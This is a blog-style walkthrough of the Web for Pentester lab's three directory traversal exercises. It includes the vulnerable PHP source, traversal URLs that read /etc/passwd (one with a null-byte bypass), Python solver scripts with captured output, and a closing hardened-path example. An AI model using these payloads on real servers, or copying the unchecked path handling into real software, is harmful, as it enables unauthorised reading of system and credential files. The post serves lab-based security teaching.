Web for Pentester Directory Traversal


Hello friends, how are you doing? In this post I will be covering the Web For Pentester directory traversal examples. We will go through the source code of each example, explain the vulnerability to you and show how to exploit it. The other sections are File Include Attacks and MySql Injection.

A shout out to all those who want to try and do it by themselves first! Don't read on if you don't want the answers :p

Directory Traversal :-

Directory traversal is an information disclosure type of attack in which the attacker manipulates user-controlled parameters (typically a file name) so that the web application accesses files outside of the website's root on the server, e.g. source code, configuration files, logs and other OS system files.

Example 1 :-

The first example is really straightforward and simple, one of the most basic exploits. The code below explains itself: the parameter named file is glued onto the upload directory on line 11 ($path = $UploadDir . $file;) with no input sanitisation at all. This means that an attacker can read system files just by sending some ../../../'s to escape the web root, followed by the path of the file he wants.

Directory Traversal – Example 1

<?php

$UploadDir = '/var/www/files/';

if (!(isset($_GET['file'])))
    die();


$file = $_GET['file'];

$path = $UploadDir . $file; // user input is concatenated unchecked: "../" climbs out of $UploadDir

if (!is_file($path)) // only checks that the resulting path is a regular file, not where it is
    die();

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));

$handle = fopen($path, 'rb');

do {
    $data = fread($handle, 8192);
    if (strlen($data) == 0) {
        break;
    }
    echo($data);
} while (true);

fclose($handle);
exit();


?>

So by just making this request the attacker can read the file:

http://[yourlab]/dirtrav/example1.php?file=../../../../../../etc/passwd

And here is also a Python script which gets the same result. This code was written by Aaron Fenwick.

Directory Traversal – Example 1 Solver

#!/usr/bin/env python3

import requests
import sys

if len(sys.argv) != 2:
    print("Usage: " + sys.argv[0] + " <ip> or <hostname>")
    sys.exit(0)

# The same traversal payload as the request above
payload = "/dirtrav/example1.php?file=../../../../../../etc/passwd"
exploit = requests.get("http://" + sys.argv[1] + payload)

print("[!] Sending payload: " + payload)
print("[+] Status Code: " + str(exploit.status_code))
print("[+] Headers..")
for item, value in exploit.headers.items():
    print(item, value)
print("[+] End of Headers..")
print("[+] Start of body..")
print(exploit.text)
print("[+] End of body..")

And here is the result you will see.

Exploitation

./dirtrav1.py 192.168.10.65
[!] Sending payload: /dirtrav/example1.php?file=../../../../../../etc/passwd
[+] Status Code: 200
[+] Headers..
content-length 475
content-disposition inline; filename="passwd";
content-encoding gzip
content-transfer-encoding binary
x-powered-by PHP/5.3.3-7+squeeze15
vary Accept-Encoding
keep-alive timeout=15, max=100
server Apache/2.2.16 (Debian)
connection Keep-Alive
cache-control public
date Sun, 13 Sep 2015 03:37:25 GMT
content-type text/html
[+] End of Headers..
[+] Start of body..
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
openldap:x:103:106:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash

[+] End of body..

 

Nowadays it is very rare to find this vulnerability in such a plain form in modern web applications, but understanding this level lets us build the base concepts, the foundation, and then learn the advanced concepts on top of them.

Example 2 :-

So let's see what is wrong with this example and how to exploit it. If we look at the source code of this example we see that the developer has put in a basic control: the path of the files directory must appear in the value of the file parameter, which is supplied by the user. Unfortunately, other than this basic check all other input from the user is left intact, and the attacker can exploit this behaviour.

Directory Traversal – Example 2

<?php


if (!(isset($_GET['file'])))
    die();


$file = $_GET['file'];

if (!(strstr($file,"/var/www/files/"))) // substring check only: anything after the string, including "../", is untouched
    die();

if (!is_file($file)) // the raw user value is opened, not a path built under the files directory
    die();

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($file) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($file));

$handle = fopen($file, 'rb');

do {
    $data = fread($handle, 8192);
    if (strlen($data) == 0) {
        break;
    }
    echo($data);
} while (true);

fclose($handle);
exit();


?>

 

So in order to bypass this filter our payload must pass the check placed by the developer on line 10 (the strstr() test for /var/www/files/). If you go for the previous method it will not work, because that payload does not contain the string /var/www/files/, so here is how to exploit it:

http://[yourlab]/dirtrav/example2.php?file=/var/www/files/../../../../../../etc/passwd

And here is the Python code.

Directory Traversal – Example 2 Solver

#!/usr/bin/env python3

import requests
import sys

if len(sys.argv) != 2:
    print("Usage: " + sys.argv[0] + " <ip> or <hostname>")
    sys.exit(0)

# The payload starts with /var/www/files/ so that the strstr() check passes
payload = "/dirtrav/example2.php?file=/var/www/files/../../../../../../etc/passwd"
exploit = requests.get("http://" + sys.argv[1] + payload)

print("[+] Status Code: " + str(exploit.status_code))
print("[+] Headers..")
for item, value in exploit.headers.items():
    print(item, value)
print("[+] End of Headers..")
print("[+] Start of body..")
print(exploit.text)
print("[+] End of body..")

 

And you will get the same result as in the previous example.

Example 3 :-

So finally the last example of this section 😀 Let's see, things are now getting more like a real-world situation: the developer has hard-coded the file extension so that we can only view .png files, and every other file type is excluded. But here the developer has real bad luck :3, because on many older setups (as the comment in the code notes, PHP's filesystem functions used to have this null-byte issue) this type of control can be bypassed by just appending a null byte (%00) at the end of your payload. That terminates the file name and bypasses the .png enforced on line 10.

Directory Traversal – Example 3

<?php
$UploadDir = '/var/www/files/';

if (!(isset($_GET['file'])))
    die();


$file = $_GET['file'];

$path = $UploadDir . $file.".png"; // the forced extension is appended after whatever the user sent, null byte included
// Simulate null-byte issue that used to be in filesystem related functions in PHP
$path = preg_replace('/\x00.*/',"",$path);

if (!is_file($path))
    die();

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));

$handle = fopen($path, 'rb');

do {
    $data = fread($handle, 8192);
    if (strlen($data) == 0) {
        break;
    }
    echo($data);
} while (true);

fclose($handle);
exit();

?>

 

So here is the exploit:

http://[yourlab]/dirtrav/example3.php?file=../../../../../../etc/passwd%00

And I hope you now know how to change the Python code to get the results.

Example 3 Solver

#!/usr/bin/env python3

import requests
import sys

if len(sys.argv) != 2:
    print("Usage: " + sys.argv[0] + " <ip> or <hostname>")
    sys.exit(0)

# %00 is decoded by PHP into a null byte, which cuts off the appended ".png"
payload = "/dirtrav/example3.php?file=../../../../../../etc/passwd%00"
exploit = requests.get("http://" + sys.argv[1] + payload)

print("[!] Sending payload: " + payload)
print("[+] Status Code: " + str(exploit.status_code))
print("[+] Headers..")
for item, value in exploit.headers.items():
    print(item, value)
print("[+] End of Headers..")
print("[+] Start of body..")
print(exploit.text)
print("[+] End of body..")

 

And it is an all-round success 😀 no questions asked, thanks to the null byte 😀
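To see side by side why the checks in all three examples fail and what a sound check looks like, here is an added Python example that is not part of the original post or of the Web for Pentester code: weak_path() mirrors each example's PHP check on the post's own payloads, and safe_path() is an assumed hardened lookup that decodes the value, refuses null bytes and any directory part, and checks containment on the resolved path. The upload directory and the file names are assumptions and nothing is read from disk, so it runs anywhere.

```python
import os
import urllib.parse

# Upload directory from the PHP listings above; only the string is used, nothing is read from disk.
UPLOAD_DIR = "/var/www/files"

# The three payloads used in this post, exactly as they travel in the query string.
PAYLOADS = {
    "example1": "../../../../../../etc/passwd",
    "example2": "/var/www/files/../../../../../../etc/passwd",
    "example3": "../../../../../../etc/passwd%00",
}

def weak_path(example, raw):
    """Mirror each PHP example's check and return the path it would open, or None."""
    name = urllib.parse.unquote(raw)  # %00 becomes a real NUL, as PHP's $_GET decoding does
    if example == "example1":  # no check at all: plain concatenation
        return UPLOAD_DIR + "/" + name
    if example == "example2":  # strstr(): a substring test, not a prefix test
        return name if "/var/www/files/" in name else None
    if example == "example3":  # forced ".png", then the simulated NUL truncation
        path = UPLOAD_DIR + "/" + name + ".png"
        return path.split("\x00", 1)[0]
    raise ValueError("unknown example: " + example)

def resolved(path):
    """The file the OS really opens once the '..' segments are collapsed."""
    return os.path.normpath(path)

def safe_path(raw, base_dir=UPLOAD_DIR, allowed_ext=".png"):
    """Hardened lookup (assumed, not the lab's code): decode, refuse NUL bytes and any
    directory part, resolve, then require containment in base_dir and the extension."""
    name = urllib.parse.unquote(raw)
    if "\x00" in name or name in ("", ".", ".."):
        return None
    if os.path.basename(name) != name:  # a "/" anywhere means a directory component
        return None
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, name))
    # Check containment on the resolved path, separator included, so that a sibling
    # directory such as /var/www/files2 is not accepted as a prefix.
    if not full.startswith(base + os.sep) or not full.endswith(allowed_ext):
        return None
    return full

if __name__ == "__main__":
    for example, payload in PAYLOADS.items():
        print(example, "->", resolved(weak_path(example, payload)), "| hardened:", safe_path(payload))
```

All three payloads resolve to /etc/passwd through the weak checks and are rejected by safe_path(), while a plain name such as cat.png is accepted.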

So this is the end of this section. I really enjoy this series and will try my best to get to the other sections as fast as I can, so stay tuned 🙂
